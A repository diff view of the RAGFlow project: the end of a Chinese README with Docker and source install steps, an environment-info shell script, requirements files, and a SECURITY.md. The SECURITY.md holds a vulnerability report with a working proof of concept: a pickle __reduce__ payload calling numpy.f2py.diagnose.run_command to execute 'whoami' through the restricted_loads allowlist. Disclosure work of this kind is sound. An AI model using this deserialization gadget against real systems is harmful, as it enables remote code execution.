146 |
+
```bash
|
147 |
+
$ docker logs -f ragflow-server
|
148 |
+
```
|
149 |
+
|
150 |
+
_出现以下界面提示说明服务器启动成功:_
|
151 |
+
|
152 |
+
```bash
|
153 |
+
____ ______ __
|
154 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
155 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
156 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
157 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
158 |
+
/____/
|
159 |
+
|
160 |
+
* Running on all addresses (0.0.0.0)
|
161 |
+
* Running on http://127.0.0.1:9380
|
162 |
+
* Running on http://x.x.x.x:9380
|
163 |
+
INFO:werkzeug:Press CTRL+C to quit
|
164 |
+
```
|
165 |
+
> 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network abnormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
|
166 |
+
|
167 |
+
5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
|
168 |
+
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
|
169 |
+
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
|
170 |
+
|
171 |
+
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
172 |
+
|
173 |
+
_好戏开始,接着奏乐接着舞!_
|
174 |
+
|
175 |
+
## 🔧 系统配置
|
176 |
+
|
177 |
+
系统配置涉及以下三份文件:
|
178 |
+
|
179 |
+
- [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
|
180 |
+
- [service_conf.yaml](./docker/service_conf.yaml):配置各类后台服务。
|
181 |
+
- [docker-compose-CN.yml](./docker/docker-compose-CN.yml): 系统依赖该文件完成启动。
|
182 |
+
|
183 |
+
请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml](./docker/service_conf.yaml) 文件中的配置保持一致!
|
184 |
+
|
185 |
+
> [./docker/README](./docker/README.md) 文件提供了环境变量设置和服务配置的详细信息。请**一定要**确保 [./docker/README](./docker/README.md) 文件当中列出来的环境变量的值与 [service_conf.yaml](./docker/service_conf.yaml) 文件当中的系统配置保持一致。
|
186 |
+
|
187 |
+
如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose-CN.yml](./docker/docker-compose-CN.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
|
188 |
+
|
189 |
+
> 所有系统配置都需要通过系统重启生效:
|
190 |
+
>
|
191 |
+
> ```bash
|
192 |
+
> $ docker compose -f docker-compose-CN.yml up -d
|
193 |
+
> ```
|
194 |
+
|
195 |
+
## 🛠️ 源码编译、安装 Docker 镜像
|
196 |
+
|
197 |
+
如需从源码安装 Docker 镜像:
|
198 |
+
|
199 |
+
```bash
|
200 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
201 |
+
$ cd ragflow/
|
202 |
+
$ docker build -t infiniflow/ragflow:v0.11.0 .
|
203 |
+
$ cd ragflow/docker
|
204 |
+
$ chmod +x ./entrypoint.sh
|
205 |
+
$ docker compose up -d
|
206 |
+
```
|
207 |
+
|
208 |
+
## 🛠️ 源码启动服务
|
209 |
+
|
210 |
+
如需从源码启动服务,请参考以下步骤:
|
211 |
+
|
212 |
+
1. 克隆仓库
|
213 |
+
|
214 |
+
```bash
|
215 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
216 |
+
$ cd ragflow/
|
217 |
+
```
|
218 |
+
|
219 |
+
2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
|
220 |
+
|
221 |
+
```bash
|
222 |
+
$ conda create -n ragflow python=3.11.0
|
223 |
+
$ conda activate ragflow
|
224 |
+
$ pip install -r requirements.txt
|
225 |
+
```
|
226 |
+
如果 cuda > 12.0,需额外执行以下命令:
|
227 |
+
```bash
|
228 |
+
$ pip uninstall -y onnxruntime-gpu
|
229 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
230 |
+
```
|
231 |
+
|
232 |
+
3. 拷贝入口脚本并配置环境变量
|
233 |
+
|
234 |
+
```bash
|
235 |
+
$ cp docker/entrypoint.sh .
|
236 |
+
$ vi entrypoint.sh
|
237 |
+
```
|
238 |
+
使用以下命令获取python路径及ragflow项目路径:
|
239 |
+
```bash
|
240 |
+
$ which python
|
241 |
+
$ pwd
|
242 |
+
```
|
243 |
+
|
244 |
+
将上述 `which python` 的输出作为 `PY` 的值,将 `pwd` 的输出作为 `PYTHONPATH` 的值。
|
245 |
+
|
246 |
+
`LD_LIBRARY_PATH` 如果环境已经配置好,可以注释掉。
|
247 |
+
|
248 |
+
```bash
|
249 |
+
# 此处配置需要按照实际情况调整,两个 export 为新增配置
|
250 |
+
PY=${PY}
|
251 |
+
export PYTHONPATH=${PYTHONPATH}
|
252 |
+
# 可选:添加 Hugging Face 镜像
|
253 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
254 |
+
```
|
255 |
+
|
256 |
+
4. 启动基础服务
|
257 |
+
|
258 |
+
```bash
|
259 |
+
$ cd docker
|
260 |
+
$ docker compose -f docker-compose-base.yml up -d
|
261 |
+
```
|
262 |
+
|
263 |
+
5. 检查配置文件
|
264 |
+
确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
|
265 |
+
|
266 |
+
6. 启动服务
|
267 |
+
|
268 |
+
```bash
|
269 |
+
$ chmod +x ./entrypoint.sh
|
270 |
+
$ bash ./entrypoint.sh
|
271 |
+
```
|
272 |
+
|
273 |
+
7. 启动WebUI服务
|
274 |
+
|
275 |
+
```bash
|
276 |
+
$ cd web
|
277 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
278 |
+
$ vim .umirc.ts
|
279 |
+
# 修改proxy.target为http://127.0.0.1:9380
|
280 |
+
$ npm run dev
|
281 |
+
```
|
282 |
+
|
283 |
+
8. 部署WebUI服务
|
284 |
+
|
285 |
+
```bash
|
286 |
+
$ cd web
|
287 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
288 |
+
$ umi build
|
289 |
+
$ mkdir -p /ragflow/web
|
290 |
+
$ cp -r dist /ragflow/web
|
291 |
+
$ apt install nginx -y
|
292 |
+
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
293 |
+
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
294 |
+
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
295 |
+
$ systemctl start nginx
|
296 |
+
```
|
297 |
+
## 📚 技术文档
|
298 |
+
|
299 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
300 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
301 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
302 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
303 |
+
|
304 |
+
## 📜 路线图
|
305 |
+
|
306 |
+
详见 [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162) 。
|
307 |
+
|
308 |
+
## 🏄 开源社区
|
309 |
+
|
310 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
311 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
312 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
313 |
+
|
314 |
+
## 🙌 贡献指南
|
315 |
+
|
316 |
+
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./docs/references/CONTRIBUTING.md) 。
|
317 |
+
|
318 |
+
## 🤝 商务合作
|
319 |
+
|
320 |
+
- [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
|
321 |
+
|
322 |
+
## 👥 加入社区
|
323 |
+
|
324 |
+
扫二维码添加 RAGFlow 小助手,进 RAGFlow 交流群。
|
325 |
+
|
326 |
+
<p align="center">
|
327 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
|
328 |
+
</p>
|
329 |
+
|
SECURITY.md
ADDED
@@ -0,0 +1,74 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# Security Policy
|
2 |
+
|
3 |
+
## Supported Versions
|
4 |
+
|
5 |
+
Use this section to tell people about which versions of your project are
|
6 |
+
currently being supported with security updates.
|
7 |
+
|
8 |
+
| Version | Supported |
|
9 |
+
| ------- | ------------------ |
|
10 |
+
| <=0.7.0 | :white_check_mark: |
|
11 |
+
|
12 |
+
## Reporting a Vulnerability
|
13 |
+
|
14 |
+
### Branch name
|
15 |
+
|
16 |
+
main
|
17 |
+
|
18 |
+
### Actual behavior
|
19 |
+
|
20 |
+
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
|
21 |
+
The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
|
22 |
+
|
23 |
+
|
24 |
+
### Steps to reproduce
|
25 |
+
|
26 |
+
|
27 |
+
**ragflow_patch.py**
|
28 |
+
|
29 |
+
```py
|
30 |
+
import builtins
|
31 |
+
import io
|
32 |
+
import pickle
|
33 |
+
|
34 |
+
safe_module = {
|
35 |
+
'numpy',
|
36 |
+
'rag_flow'
|
37 |
+
}
|
38 |
+
|
39 |
+
|
40 |
+
class RestrictedUnpickler(pickle.Unpickler):
|
41 |
+
def find_class(self, module, name):
|
42 |
+
import importlib
|
43 |
+
if module.split('.')[0] in safe_module:
|
44 |
+
_module = importlib.import_module(module)
|
45 |
+
return getattr(_module, name)
|
46 |
+
# Forbid everything else.
|
47 |
+
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
48 |
+
(module, name))
|
49 |
+
|
50 |
+
|
51 |
+
def restricted_loads(src):
|
52 |
+
"""Helper function analogous to pickle.loads()."""
|
53 |
+
return RestrictedUnpickler(io.BytesIO(src)).load()
|
54 |
+
```
|
55 |
+
Then, **PoC.py**
|
56 |
+
```py
|
57 |
+
import pickle
|
58 |
+
from ragflow_patch import restricted_loads
|
59 |
+
class Exploit:
|
60 |
+
def __reduce__(self):
|
61 |
+
import numpy.f2py.diagnose
|
62 |
+
return numpy.f2py.diagnose.run_command, ('whoami', )
|
63 |
+
|
64 |
+
Payload=pickle.dumps(Exploit())
|
65 |
+
restricted_loads(Payload)
|
66 |
+
```
|
67 |
+
**Result**
|
68 |
+
![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
|
69 |
+
|
70 |
+
|
71 |
+
### Additional information
|
72 |
+
|
73 |
+
#### How to prevent?
|
74 |
+
Strictly filter the module and name before calling with getattr function.
|
printEnvironment.sh
ADDED
@@ -0,0 +1,67 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
#!/bin/bash
|
2 |
+
|
3 |
+
# The function is used to obtain distribution information
|
4 |
+
get_distro_info() {
|
5 |
+
local distro_id=$(lsb_release -i -s 2>/dev/null)
|
6 |
+
local distro_version=$(lsb_release -r -s 2>/dev/null)
|
7 |
+
local kernel_version=$(uname -r)
|
8 |
+
|
9 |
+
# If lsd_release is not available, try parsing the/etc/* - release file
|
10 |
+
if [ -z "$distro_id" ] || [ -z "$distro_version" ]; then
|
11 |
+
distro_id=$(grep '^ID=' /etc/*-release | cut -d= -f2 | tr -d '"')
|
12 |
+
distro_version=$(grep '^VERSION_ID=' /etc/*-release | cut -d= -f2 | tr -d '"')
|
13 |
+
fi
|
14 |
+
|
15 |
+
echo "$distro_id $distro_version (Kernel version: $kernel_version)"
|
16 |
+
}
|
17 |
+
|
18 |
+
# get Git repo name
|
19 |
+
git_repo_name=''
|
20 |
+
if git rev-parse --is-inside-work-tree > /dev/null 2>&1; then
|
21 |
+
git_repo_name=$(basename "$(git rev-parse --show-toplevel)")
|
22 |
+
if [ $? -ne 0 ]; then
|
23 |
+
git_repo_name="(Can't get repo name)"
|
24 |
+
fi
|
25 |
+
else
|
26 |
+
git_repo_name="It NOT a Git repo"
|
27 |
+
fi
|
28 |
+
|
29 |
+
# get CPU type
|
30 |
+
cpu_model=$(uname -m)
|
31 |
+
|
32 |
+
# get memory size
|
33 |
+
memory_size=$(free -h | grep Mem | awk '{print $2}')
|
34 |
+
|
35 |
+
# get docker version
|
36 |
+
docker_version=''
|
37 |
+
if command -v docker &> /dev/null; then
|
38 |
+
docker_version=$(docker --version | cut -d ' ' -f3)
|
39 |
+
else
|
40 |
+
docker_version="Docker not installed"
|
41 |
+
fi
|
42 |
+
|
43 |
+
# get python version
|
44 |
+
python_version=''
|
45 |
+
if command -v python &> /dev/null; then
|
46 |
+
python_version=$(python --version | cut -d ' ' -f2)
|
47 |
+
else
|
48 |
+
python_version="Python not installed"
|
49 |
+
fi
|
50 |
+
|
51 |
+
# Print all infomation
|
52 |
+
echo "Current Repo: $git_repo_name"
|
53 |
+
|
54 |
+
# get Commit ID
|
55 |
+
git_version=$(git log -1 --pretty=format:'%h')
|
56 |
+
|
57 |
+
if [ -z "$git_version" ]; then
|
58 |
+
echo "Commit Id: The current directory is not a Git repository, or the Git command is not installed."
|
59 |
+
else
|
60 |
+
echo "Commit Id: $git_version"
|
61 |
+
fi
|
62 |
+
|
63 |
+
echo "Operating system: $(get_distro_info)"
|
64 |
+
echo "CPU Type: $cpu_model"
|
65 |
+
echo "Memory: $memory_size"
|
66 |
+
echo "Docker Version: $docker_version"
|
67 |
+
echo "Python Version: $python_version"
|
requirements.txt
ADDED
@@ -0,0 +1,104 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
akshare==1.14.72
|
2 |
+
azure-storage-blob==12.22.0
|
3 |
+
azure-identity==1.17.1
|
4 |
+
azure-storage-file-datalake==12.16.0
|
5 |
+
anthropic===0.34.1
|
6 |
+
arxiv==2.1.3
|
7 |
+
Aspose.Slides==24.2.0
|
8 |
+
BCEmbedding==0.1.3
|
9 |
+
Bio==1.7.1
|
10 |
+
boto3==1.34.140
|
11 |
+
botocore==1.34.140
|
12 |
+
cachetools==5.3.3
|
13 |
+
chardet==5.2.0
|
14 |
+
cn2an==0.5.22
|
15 |
+
cohere==5.6.2
|
16 |
+
dashscope==1.14.1
|
17 |
+
datrie==0.8.2
|
18 |
+
deepl==1.18.0
|
19 |
+
demjson3==3.0.6
|
20 |
+
discord.py==2.3.2
|
21 |
+
duckduckgo_search==6.1.9
|
22 |
+
editdistance==0.8.1
|
23 |
+
elastic_transport==8.12.0
|
24 |
+
elasticsearch==8.12.1
|
25 |
+
elasticsearch_dsl==8.12.0
|
26 |
+
fastembed==0.2.6
|
27 |
+
fasttext==0.9.3
|
28 |
+
filelock==3.15.4
|
29 |
+
FlagEmbedding==1.2.10
|
30 |
+
Flask==3.0.3
|
31 |
+
Flask_Cors==5.0.0
|
32 |
+
Flask_Login==0.6.3
|
33 |
+
flask_session==0.8.0
|
34 |
+
google_search_results==2.4.2
|
35 |
+
groq==0.9.0
|
36 |
+
hanziconv==0.3.2
|
37 |
+
html_text==0.6.2
|
38 |
+
httpx==0.27.0
|
39 |
+
huggingface_hub==0.20.3
|
40 |
+
infinity_emb==0.0.51
|
41 |
+
itsdangerous==2.1.2
|
42 |
+
Markdown==3.6
|
43 |
+
markdown_to_json==2.1.1
|
44 |
+
minio==7.2.4
|
45 |
+
mistralai==0.4.2
|
46 |
+
nltk==3.9
|
47 |
+
numpy==1.26.4
|
48 |
+
ollama==0.2.1
|
49 |
+
onnxruntime==1.17.3
|
50 |
+
onnxruntime_gpu==1.17.1
|
51 |
+
openai==1.12.0
|
52 |
+
opencv_python==4.9.0.80
|
53 |
+
opencv_python_headless==4.9.0.80
|
54 |
+
openpyxl==3.1.2
|
55 |
+
ormsgpack==1.5.0
|
56 |
+
pandas==2.2.2
|
57 |
+
pdfplumber==0.10.4
|
58 |
+
peewee==3.17.1
|
59 |
+
Pillow==10.3.0
|
60 |
+
pipreqs==0.5.0
|
61 |
+
protobuf==5.27.2
|
62 |
+
psycopg2-binary==2.9.9
|
63 |
+
pyclipper==1.3.0.post5
|
64 |
+
pycryptodomex==3.20.0
|
65 |
+
pypdf==4.3.0
|
66 |
+
PyPDF2==3.0.1
|
67 |
+
pytest==8.2.2
|
68 |
+
python-dotenv==1.0.1
|
69 |
+
python_dateutil==2.8.2
|
70 |
+
python_pptx==0.6.23
|
71 |
+
pywencai==0.12.2
|
72 |
+
qianfan==0.4.6
|
73 |
+
ranx==0.3.20
|
74 |
+
readability_lxml==0.8.1
|
75 |
+
redis==5.0.3
|
76 |
+
Requests==2.32.2
|
77 |
+
replicate==0.31.0
|
78 |
+
roman_numbers==1.0.2
|
79 |
+
ruamel.base==1.0.0
|
80 |
+
scholarly==1.7.11
|
81 |
+
scikit_learn==1.5.0
|
82 |
+
selenium==4.22.0
|
83 |
+
setuptools==70.0.0
|
84 |
+
Shapely==2.0.5
|
85 |
+
six==1.16.0
|
86 |
+
StrEnum==0.4.15
|
87 |
+
tabulate==0.9.0
|
88 |
+
tencentcloud-sdk-python==3.0.1215
|
89 |
+
tika==2.6.0
|
90 |
+
tiktoken==0.6.0
|
91 |
+
torch==2.3.0
|
92 |
+
transformers==4.38.1
|
93 |
+
umap==0.1.1
|
94 |
+
vertexai==1.64.0
|
95 |
+
volcengine==1.0.146
|
96 |
+
voyageai==0.2.3
|
97 |
+
webdriver_manager==4.0.1
|
98 |
+
Werkzeug==3.0.3
|
99 |
+
wikipedia==1.4.0
|
100 |
+
word2number==1.1
|
101 |
+
xgboost==2.1.0
|
102 |
+
xpinyin==0.7.6
|
103 |
+
yfinance==0.1.96
|
104 |
+
zhipuai==2.0.1
|
requirements_arm.txt
ADDED
@@ -0,0 +1,175 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
accelerate==0.27.2
|
2 |
+
aiohttp==3.10.2
|
3 |
+
aiosignal==1.3.1
|
4 |
+
annotated-types==0.6.0
|
5 |
+
anthropic===0.34.1
|
6 |
+
anyio==4.3.0
|
7 |
+
argon2-cffi==23.1.0
|
8 |
+
argon2-cffi-bindings==21.2.0
|
9 |
+
#Aspose.Slides==24.2.0
|
10 |
+
attrs==23.2.0
|
11 |
+
blinker==1.7.0
|
12 |
+
cachelib==0.12.0
|
13 |
+
cachetools==5.3.3
|
14 |
+
certifi==2024.7.4
|
15 |
+
cffi==1.16.0
|
16 |
+
charset-normalizer==3.3.2
|
17 |
+
click==8.1.7
|
18 |
+
cohere==5.6.2
|
19 |
+
coloredlogs==15.0.1
|
20 |
+
cryptography==43.0.1
|
21 |
+
dashscope==1.14.1
|
22 |
+
datasets==2.17.1
|
23 |
+
datrie==0.8.2
|
24 |
+
demjson3==3.0.6
|
25 |
+
dill==0.3.8
|
26 |
+
distro==1.9.0
|
27 |
+
elastic-transport==8.12.0
|
28 |
+
elasticsearch==8.12.1
|
29 |
+
elasticsearch-dsl==8.12.0
|
30 |
+
et-xmlfile==1.1.0
|
31 |
+
filelock==3.13.1
|
32 |
+
fastembed==0.2.6
|
33 |
+
FlagEmbedding==1.2.5
|
34 |
+
Flask==3.0.2
|
35 |
+
Flask-Cors==5.0.0
|
36 |
+
Flask-Login==0.6.3
|
37 |
+
Flask-Session==0.6.0
|
38 |
+
flatbuffers==23.5.26
|
39 |
+
frozenlist==1.4.1
|
40 |
+
fsspec==2023.10.0
|
41 |
+
h11==0.14.0
|
42 |
+
hanziconv==0.3.2
|
43 |
+
httpcore==1.0.4
|
44 |
+
httpx==0.27.0
|
45 |
+
huggingface-hub==0.20.3
|
46 |
+
humanfriendly==10.0
|
47 |
+
idna==3.7
|
48 |
+
itsdangerous==2.1.2
|
49 |
+
Jinja2==3.1.4
|
50 |
+
joblib==1.3.2
|
51 |
+
lxml==5.1.0
|
52 |
+
MarkupSafe==2.1.5
|
53 |
+
minio==7.2.4
|
54 |
+
mpmath==1.3.0
|
55 |
+
multidict==6.0.5
|
56 |
+
multiprocess==0.70.16
|
57 |
+
networkx==3.2.1
|
58 |
+
nltk==3.9
|
59 |
+
numpy==1.26.4
|
60 |
+
# nvidia-cublas-cu12==12.1.3.1
|
61 |
+
# nvidia-cuda-cupti-cu12==12.1.105
|
62 |
+
# nvidia-cuda-nvrtc-cu12==12.1.105
|
63 |
+
# nvidia-cuda-runtime-cu12==12.1.105
|
64 |
+
# nvidia-cudnn-cu12==8.9.2.26
|
65 |
+
# nvidia-cufft-cu12==11.0.2.54
|
66 |
+
# nvidia-curand-cu12==10.3.2.106
|
67 |
+
# nvidia-cusolver-cu12==11.4.5.107
|
68 |
+
# nvidia-cusparse-cu12==12.1.0.106
|
69 |
+
# nvidia-nccl-cu12==2.19.3
|
70 |
+
# nvidia-nvjitlink-cu12==12.3.101
|
71 |
+
# nvidia-nvtx-cu12==12.1.105
|
72 |
+
ollama==0.1.9
|
73 |
+
# onnxruntime-gpu==1.17.1
|
74 |
+
openai==1.12.0
|
75 |
+
opencv-python==4.9.0.80
|
76 |
+
openpyxl==3.1.2
|
77 |
+
ormsgpack==1.5.0
|
78 |
+
packaging==23.2
|
79 |
+
pandas==2.2.1
|
80 |
+
pdfminer.six==20221105
|
81 |
+
pdfplumber==0.10.4
|
82 |
+
peewee==3.17.1
|
83 |
+
pillow==10.3.0
|
84 |
+
protobuf==4.25.3
|
85 |
+
psutil==5.9.8
|
86 |
+
psycopg2-binary==2.9.9
|
87 |
+
pyarrow==15.0.0
|
88 |
+
pyarrow-hotfix==0.6
|
89 |
+
pyclipper==1.3.0.post5
|
90 |
+
pycparser==2.21
|
91 |
+
pycryptodome
|
92 |
+
pycryptodome-test-vectors
|
93 |
+
pycryptodomex
|
94 |
+
pydantic==2.6.2
|
95 |
+
pydantic_core==2.16.3
|
96 |
+
PyJWT==2.8.0
|
97 |
+
PyMySQL==1.1.1
|
98 |
+
PyPDF2==3.0.1
|
99 |
+
pypdfium2==4.27.0
|
100 |
+
python-dateutil==2.8.2
|
101 |
+
python-docx==1.1.0
|
102 |
+
python-dotenv==1.0.1
|
103 |
+
python-pptx==0.6.23
|
104 |
+
PyYAML==6.0.1
|
105 |
+
qianfan==0.4.6
|
106 |
+
redis==5.0.3
|
107 |
+
regex==2023.12.25
|
108 |
+
replicate==0.31.0
|
109 |
+
requests==2.32.2
|
110 |
+
ruamel.yaml==0.18.6
|
111 |
+
ruamel.yaml.clib==0.2.8
|
112 |
+
safetensors==0.4.2
|
113 |
+
scikit-learn==1.5.0
|
114 |
+
scipy==1.12.0
|
115 |
+
sentence-transformers==2.4.0
|
116 |
+
shapely==2.0.3
|
117 |
+
six==1.16.0
|
118 |
+
sniffio==1.3.1
|
119 |
+
StrEnum==0.4.15
|
120 |
+
sympy==1.12
|
121 |
+
tencentcloud-sdk-python==3.0.1215
|
122 |
+
threadpoolctl==3.3.0
|
123 |
+
tika==2.6.0
|
124 |
+
tiktoken==0.6.0
|
125 |
+
tokenizers==0.15.2
|
126 |
+
torch==2.2.1
|
127 |
+
tqdm==4.66.3
|
128 |
+
transformers==4.38.1
|
129 |
+
# triton==2.2.0
|
130 |
+
typing_extensions==4.10.0
|
131 |
+
tzdata==2024.1
|
132 |
+
urllib3==2.2.2
|
133 |
+
Werkzeug==3.0.3
|
134 |
+
xgboost==2.0.3
|
135 |
+
XlsxWriter==3.2.0
|
136 |
+
xpinyin==0.7.6
|
137 |
+
xxhash==3.4.1
|
138 |
+
yarl==1.9.4
|
139 |
+
zhipuai==2.0.1
|
140 |
+
BCEmbedding
|
141 |
+
loguru==0.7.2
|
142 |
+
umap-learn
|
143 |
+
fasttext==0.9.2
|
144 |
+
volcengine==1.0.141
|
145 |
+
voyageai==0.2.3
|
146 |
+
opencv-python-headless==4.9.0.80
|
147 |
+
readability-lxml==0.8.1
|
148 |
+
html_text==0.6.2
|
149 |
+
selenium==4.21.0
|
150 |
+
webdriver-manager==4.0.1
|
151 |
+
cn2an==0.5.22
|
152 |
+
roman-numbers==1.0.2
|
153 |
+
word2number==1.1
|
154 |
+
markdown==3.6
|
155 |
+
mistralai==0.4.2
|
156 |
+
boto3==1.34.140
|
157 |
+
duckduckgo_search==6.1.9
|
158 |
+
google-generativeai==0.7.2
|
159 |
+
groq==0.9.0
|
160 |
+
wikipedia==1.4.0
|
161 |
+
Bio==1.7.1
|
162 |
+
arxiv==2.1.3
|
163 |
+
pypdf==4.3.0
|
164 |
+
google_search_results==2.4.2
|
165 |
+
editdistance==0.8.1
|
166 |
+
markdown_to_json==2.1.1
|
167 |
+
scholarly==1.7.11
|
168 |
+
deepl==1.18.0
|
169 |
+
psycopg2-binary==2.9.9
|
170 |
+
tabulate==0.9.0
|
171 |
+
vertexai==1.64.0
|
172 |
+
yfinance==0.1.96
|
173 |
+
pywencai==0.12.2
|
174 |
+
akshare==1.14.72
|
175 |
+
ranx==0.3.20
|